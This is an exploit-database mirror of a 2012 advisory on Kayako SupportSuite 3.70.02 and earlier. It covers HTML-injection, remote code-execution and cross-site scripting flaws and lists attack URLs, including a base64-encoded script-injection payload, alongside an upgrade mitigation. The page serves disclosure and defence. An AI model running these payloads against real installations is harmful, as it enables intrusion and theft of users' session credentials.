header-logo
Suggest Exploit
vendor:
SupportSuite
by:
SecurityFocus
8,8
CVSS
HIGH
Multiple HTML-injection, Remote Code-Execution, Cross-Site Scripting
79, 78, 80
CWE
Product Name: SupportSuite
Affected Version From: 3.70.02-stable
Affected Version To: Prior versions
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Kayako SupportSuite Multiple Vulnerabilities

Kayako SupportSuite is prone to multiple HTML-injection, remote code-execution, and cross-site scripting vulnerabilities. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible. Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable.

Mitigation:

Upgrade to the latest version of Kayako SupportSuite.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51377/info

Kayako SupportSuite is prone to the following vulnerabilities:

1. Multiple HTML-injection vulnerabilities.
2. A remote code-execution vulnerability.
3. Multiple cross-site scripting vulnerabilities.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected application, potentially allowing the attacker to steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

Kayako SupportSuite 3.70.02-stable and prior versions are vulnerable. 

Remote code-execution:
http://www.example.com/support/admin/index.php?_m=core&_a=edittemplate&templateid=11&templateupdate=register

Cross-site scripting:
http://www.example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9

http://www.example.com/support/staff/index.php?_m=news&_a=managenews

http://www.example.com/support/staff/index.php?_m=troubleshooter&_a=managecategories

http://www.example.com/support/staff/index.php?_m=downloads&_a=managefiles

http://www.example.com/support/staff/index.php?_m=teamwork&_a=editcontact&contactid=[added contact ID]

http://www.example.com/support/staff/index.php?_m=livesupport&_a=adtracking

http://www.example.com/support/staff/index.php?_m=livesupport&_a=managecannedresponses

http://www.example.com/support/staff/index.php?_m=tickets&_a=managealerts

http://www.example.com/support/staff/index.php?_m=tickets&_a=managefilters

Navigation

Suggest Exploit

Services By CQR